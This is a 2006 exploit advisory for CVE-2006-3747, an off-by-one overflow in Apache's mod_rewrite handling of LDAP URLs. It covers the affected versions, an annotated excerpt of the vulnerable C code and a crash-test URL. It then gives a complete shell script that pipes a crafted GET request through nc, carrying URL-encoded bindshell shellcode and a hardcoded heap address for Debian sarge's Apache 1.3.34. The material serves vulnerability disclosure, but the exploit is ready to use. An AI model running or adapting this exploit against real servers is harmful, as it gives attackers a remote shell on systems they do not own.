Public release date of POC/Exploit: 2006-08-20 Author: Jacobo Avariento Gimeno CVE id: CVE-2006-3747 Bugtraq id: 19204 CERT advisory: VU#395412 Severity: high Introduction ---- On July 28 2006 Mark Dowd (McAfee Avert Labs) reported a vulnerability found in mod_rewrite apache module to the bugtraq mailing list. The vulnerable function is escape_absolute_uri() and the problem only could be arised when mod_rewrite is dealing with an LDAP URL, a malformed LDAP URL could trigger an off-by-one overflow in certain (special) situations and a possible attacker could cause a denial-of-service or execute arbitrary code with the privileges of the apache user. To exploit this vulnerability isn't necessary an LDAP-specific rule, but must have a rule which the user can control the inital part of the remapped URL, i.e.: RewriteRule foo/(.*) $1 Any version of the Apache HTTP server: * 1.3 branch: >1.3.28 and <1.3.37 * 2.0 branch: >2.0.46 and <2.0.59 * 2.2 branch: >2.2.0 and <2.2.3 is vulnerable. Analysis of the vulnerable code ---- 2696 /* escape absolute uri, which may or may not be path oriented. 2697 * So let's handle them differently. 2698 */ 2699 static char *escape_absolute_uri(ap_pool *p, char *uri, unsigned scheme) 2700 { 2701 char *cp; 2702 ... ... 2727 /* special thing for ldap. 2728 * The parts are separated by question marks. From RFC 2255: 2729 * ldapurl = scheme "://" [hostport] ["/" 2730 * [dn ["?" [attributes] ["?" [scope] 2731 * ["?" [filter] ["?" extensions]]]]]] 2732 */ 2733 if (!strncasecmp(uri, "ldap", 4)) { 2734 char *token[5]; 2735 int c = 0; 2736 2737 token[0] = cp = ap_pstrdup(p, cp); 2738 while (*cp && c < 5) { 2739 if (*cp == '?') { 2740 token[++c] = cp + 1; 2741 *cp = '\0'; 2742 } 2743 ++cp; 2744 } In the case that an LDAP URI contains a fifth '?' the line 2740 causes an off-by-one overflow, it's writing in token[5]. To exploit this problem is necessary a vulnerable apache version and a specific stack frame layout. Proof of concept ---- To know if your apache vulnerable version could be successful exploited, write this rule in your httpd.conf or .htaccess file: RewriteRule kung/(.*) $1 And try to access to the following URL: /kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA% 3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB If your web server doesn't reply you with a '302 Found' page or a Segmentation Fault appears in your error_log, an apache child has crashed and your web server is vulnerable and exploitable. Exploit ---- This exploit was successful executed on Apache 1.3.34, debian sarge package: #!/bin/sh # Exploit for Apache mod_rewrite off-by-one. # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # by jack # 2006-08-20 # # Thx to xuso for help me with the shellcode. # # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified # for avoiding apache url-escape.. Take a look is quite nice ;) # # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at # 0x0834ae77 for any other version/system find it. # # Gulcas rulez :P echo -e "mod_rewrite apache off-by-one overflow\nby jack \n\n" if [ $# -ne 1 ] ; then echo "Usage: $0 webserver" exit fi host=$1 echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6% 31%c0%31 %db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3% 01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04% 31%c0%89%46%10%b0%10%89%46%08% b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66% b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31% c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8% 23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76% 08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db% cd %80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC% 77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost: $host\r\n\r\n" | nc $host 80 More info is coming at http://ciberjacobo.com/sec/mod_rewrite.html -- Jacobo Avariento Gimeno http://ciberjacobo.com OpenPGP key: http://ciberjacobo.com/key.pem